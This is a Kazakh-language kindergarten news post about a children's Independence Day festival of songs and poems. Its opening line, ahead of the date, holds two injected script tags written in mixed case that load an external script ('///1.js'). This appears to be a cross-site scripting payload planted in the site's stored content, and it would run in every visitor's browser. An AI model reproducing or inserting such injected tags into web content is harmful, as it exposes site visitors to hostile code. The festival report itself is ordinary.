<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.12.2017

14 қараша күні №7 «Айша» балабақшасында музыка жетекшілерінің Г.М. Камалиева, С.Р. Байзахова, А.Қ. Садуова ұйымдаструымен  «Тәуелсіз ел - тілегі» атты ересек топ балалар арасында фестиваль өткізілді. Мақсаты: Балалардың патриоттық сезімдерін ояту,  еліне, жеріне деген сүйіспеншіліктерін арттыру, өз отанының тарихын құрметтеуге тәрбиелеу болып табылды. Іс – шараға ересек топтары  №9 «Чип пен Дейл», №10 «Симба», №11 «Бемби», №12 «Том мен Джерри», №14 «Тұлпар», №15 «Кішкентай мук», №16 «Джамбо»  қатысты.

Атап айтқанда, №9 «Чип пен Дейл» тобы «Егемен ел», №10 «Симба» тобы «Тәуелсіз ел, ұланы», №11 «Бемби» тобы «Мен елімнің ертеңі», №12 «Том мен Джерри» тобы «Елтаңбасы елімнің», №14 «Тұлпар» және №15 «Кішкентай

мук» топтары «16 желтоқсан», №16 «Джамбо» тобы «Сәлем, Қазақстан!» әндері мен тәуелсіздікке арналған өлеңдерін орындады. Барлық топтың балалары бұл фестивальға белсенді қатысып, жақсы көңіл күймен аяқтады. Фестиваль ойдағыдай өтті.  

Просмотров: 484


Пікір қосу



Деректерді қолтаңбаға қосу